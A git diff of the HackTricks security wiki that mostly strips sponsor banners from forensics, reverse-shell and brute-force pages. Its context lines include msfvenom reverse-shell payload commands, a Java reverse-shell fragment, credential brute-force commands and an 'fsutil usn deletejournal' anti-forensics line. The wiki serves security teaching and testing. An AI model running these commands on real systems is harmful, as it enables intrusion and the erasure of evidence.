- -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! - -{% embed url="https://go.intigriti.com/hacktricks" %} ## From Compiled Binary to .pyc @@ -223,10 +218,7 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py - [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/) -
- -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! - -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md index 76fa3ef23..b3cf47a1b 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -39,3 +39,5 @@ zips-tricks.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md index ba35ea1fd..c1f89d74f 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md @@ -2,14 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - ## Browsers Artifacts Browser artifacts include various types of data stored by web browsers, such as navigation history, bookmarks, and cache data. These artifacts are kept in specific folders within the operating system, differing in location and name across browsers, yet generally storing similar data types. @@ -169,12 +161,6 @@ These paths and commands are crucial for accessing and understanding the browsin - [https://books.google.com/books?id=jfMqCgAAQBAJ\&pg=PA128\&lpg=PA128\&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file) - **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123** -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index c22a6f566..4a514defb 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -48,3 +48,5 @@ End Function ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md index 99792162b..e5a5adf74 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md @@ -2,13 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## OneDrive @@ -103,12 +96,6 @@ Other tables inside this database contain more interesting information: - **deleted_fields**: Dropbox deleted files - **date_added** -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md index 34433ce87..0304cb9c0 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md @@ -2,13 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary: @@ -25,12 +18,6 @@ sudo pip3 install -U oletools olevba -c /path/to/document #Extract macros ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md index 79799f2d8..b32d72ddf 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md @@ -2,14 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - **For further details check:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/) The PDF format is known for its complexity and potential for concealing data, making it a focal point for CTF forensics challenges. It combines plain-text elements with binary objects, which might be compressed or encrypted, and can include scripts in languages like JavaScript or Flash. To understand PDF structure, one can refer to Didier Stevens's [introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), or use tools like a text editor or a PDF-specific editor such as Origami. @@ -26,3 +18,5 @@ For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://gith For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index 6108df028..d577ba693 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -7,3 +7,5 @@ For checking PNG file integrity and repairing corruption, **pngcheck** is a cruc These strategies underscore the importance of a comprehensive approach in CTFs, utilizing a blend of analytical tools and repair techniques to uncover and recover hidden or lost data. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index a1e143cb0..5ec1db19f 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,10 +1,5 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} **Audio and video file manipulation** is a staple in **CTF forensics challenges**, leveraging **steganography** and metadata analysis to hide or reveal secret messages. Tools such as **[mediainfo](https://mediaarea.net/en/MediaInfo)** and **`exiftool`** are essential for inspecting file metadata and identifying content types. @@ -20,10 +15,7 @@ This array of tools underscores the versatility required in CTF challenges, wher - [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index d4e17eb0d..cf87f9a6c 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -19,3 +19,5 @@ It's crucial to note that password-protected zip files **do not encrypt filename - [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/windows-forensics/README.md b/src/forensics/basic-forensic-methodology/windows-forensics/README.md index 08b2ede8c..b73f8361f 100644 --- a/src/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/src/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -4,9 +4,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} ## Generic Windows Artifacts @@ -507,8 +504,7 @@ EventID 6005 indicates system startup, while EventID 6006 marks shutdown. Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis. -
- -{% embed url="https://websec.nl/" %} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index 840b910bc..c508fab70 100644 --- a/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -99,3 +99,5 @@ This guide condenses the crucial paths and methods for accessing detailed system, network, and user activity information on Windows systems, aiming for clarity and usability. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md index 06f914970..1451e1daf 100644 --- a/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md +++ b/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md @@ -104,3 +104,5 @@ This is run from **userinit.exe** which should be terminated, so **no parent** s - Are the children processes the expecting ones? (no cmd.exe, wscript.exe, powershell.exe..?) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/brute-force.md b/src/generic-hacking/brute-force.md index 9b2faa122..ab9bffb5d 100644 --- a/src/generic-hacking/brute-force.md +++ b/src/generic-hacking/brute-force.md @@ -1,13 +1,5 @@ # Brute Force - CheatSheet -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %} - {{#include ../banners/hacktricks-training.md}} ## Default Credentials @@ -96,14 +88,6 @@ Finished in 0.920s. - [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager) - [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists) -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %} - ## Services Ordered alphabetically by service name. @@ -551,13 +535,6 @@ set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst crackmapexec winrm -d -u usernames.txt -p passwords.txt ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %} ## Local @@ -754,14 +731,6 @@ zip -r file.xls . crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %} - ## Tools **Hash examples:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes) @@ -905,10 +874,4 @@ Cracking Common Application Hashes {{#include ../banners/hacktricks-training.md}} -
-\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %} diff --git a/src/generic-hacking/exfiltration.md b/src/generic-hacking/exfiltration.md index 2e5c0c1dd..3ba272f2e 100644 --- a/src/generic-hacking/exfiltration.md +++ b/src/generic-hacking/exfiltration.md @@ -365,3 +365,5 @@ Then copy-paste the text into the windows-shell and a file called nc.exe will be - [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/reverse-shells/README.md b/src/generic-hacking/reverse-shells/README.md index 9f8253367..1d4a7f319 100644 --- a/src/generic-hacking/reverse-shells/README.md +++ b/src/generic-hacking/reverse-shells/README.md @@ -22,3 +22,5 @@ - [**https://github.com/mthbernardes/rsg**](https://github.com/mthbernardes/rsg) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md b/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md index b52276fda..c174cee6d 100644 --- a/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md +++ b/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md @@ -86,3 +86,5 @@ npx localtunnel --port 8000 ``` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/reverse-shells/full-ttys.md b/src/generic-hacking/reverse-shells/full-ttys.md index 32d0eb1d5..23aaebc2b 100644 --- a/src/generic-hacking/reverse-shells/full-ttys.md +++ b/src/generic-hacking/reverse-shells/full-ttys.md @@ -2,12 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} - ## Full TTY Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`. @@ -112,10 +106,6 @@ If for some reason you cannot obtain a full TTY you **still can interact with pr expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "";send "\r\n";interact' ``` -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} - {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/reverse-shells/linux.md b/src/generic-hacking/reverse-shells/linux.md index c1caa101d..f4cad3f87 100644 --- a/src/generic-hacking/reverse-shells/linux.md +++ b/src/generic-hacking/reverse-shells/linux.md @@ -380,3 +380,5 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/reverse-shells/msfvenom.md b/src/generic-hacking/reverse-shells/msfvenom.md index 49444f77b..d0450ec37 100644 --- a/src/generic-hacking/reverse-shells/msfvenom.md +++ b/src/generic-hacking/reverse-shells/msfvenom.md @@ -2,21 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! - -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - --- ## Basic msfvenom @@ -184,19 +169,6 @@ msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh ``` -
- -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! - -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/reverse-shells/windows.md b/src/generic-hacking/reverse-shells/windows.md index 4bf4f6792..9d9a48dad 100644 --- a/src/generic-hacking/reverse-shells/windows.md +++ b/src/generic-hacking/reverse-shells/windows.md @@ -557,3 +557,5 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive - [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/search-exploits.md b/src/generic-hacking/search-exploits.md index 8d195840a..eafcf5a04 100644 --- a/src/generic-hacking/search-exploits.md +++ b/src/generic-hacking/search-exploits.md @@ -2,14 +2,6 @@ {{#include ../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=search-exploits) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=search-exploits" %} - ### Browser Always search in "google" or others: **\ \[version] exploit** @@ -60,12 +52,7 @@ GTFOBins-like curated list of exploits with filters by vulnerability type (Local search_vulns enables you to search for known vulnerabilities and exploits as well: [**https://search-vulns.com/**](https://search-vulns.com/). It utilizes various data sources like the NVD, the Exploit-DB, PoC-in-GitHub, the GitHub Security Advisory database and endoflife.date. -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=search-exploits) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=search-exploits" %} {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/tunneling-and-port-forwarding.md b/src/generic-hacking/tunneling-and-port-forwarding.md index 902da0e5b..08446fe1d 100644 --- a/src/generic-hacking/tunneling-and-port-forwarding.md +++ b/src/generic-hacking/tunneling-and-port-forwarding.md @@ -651,3 +651,5 @@ tunnels: - [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md index e725dfa85..531ec98f0 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md @@ -80,3 +80,5 @@ file-integrity-monitoring.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md index 94a381b98..9221761a1 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md @@ -151,3 +151,5 @@ It's also possible to modify the configuration of which files are going to be co - `fsutil usn deletejournal /d c:` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md index 629251985..17a36b6cb 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md @@ -2,11 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} ## Container modification @@ -122,10 +117,7 @@ Note that when you run a docker container inside a host **you can see the proces Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/#process-memory). -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md index 214b917cf..a1e4d8502 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md @@ -24,3 +24,5 @@ File Integrity Monitoring (FIM) is a critical security technique that protects I - [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md index a95a3bbff..3c8aae4ac 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md @@ -2,9 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} ## Acquisition @@ -114,8 +111,7 @@ Note that sector size is **512** and start is **2048**. Then mount the image lik mount disk.img /mnt -o ro,offset=$((2048*512)) ``` -
- -{% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md index 568da19c5..49acdb9f9 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md @@ -1,13 +1,5 @@ # Linux Forensics -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %} - {{#include ../../banners/hacktricks-training.md}} ## Initial Information Gathering @@ -150,14 +142,6 @@ icat -i raw -f ext4 disk.img 16 ThisisTheMasterSecret ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %} - ## Search for known Malware ### Modified System Files @@ -200,14 +184,6 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not" find / -type f -executable | grep ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %} - ## Recover Deleted Running Binaries Imagine a process that was executed from /tmp/exec and then deleted. It's possible to extract it @@ -343,14 +319,6 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %} - ## Review User Accounts and Logon Activities Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and or used in close proximity to known unauthorized events. Also, check possible sudo brute-force attacks.\ @@ -429,10 +397,5 @@ git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/ {{#include ../../banners/hacktricks-training.md}} -
-\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md index c7edd6650..b3d7379c3 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md @@ -170,3 +170,5 @@ If the files of a folder **shouldn't have been modified**, you can calculate the When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a web shell might be one of the most**. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md index 1c8be749a..f293ef856 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md @@ -2,12 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - ## Start Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md). @@ -40,10 +34,6 @@ You should **open** it using **IDA** or **Radare** to inspection it in **depth** ​ -
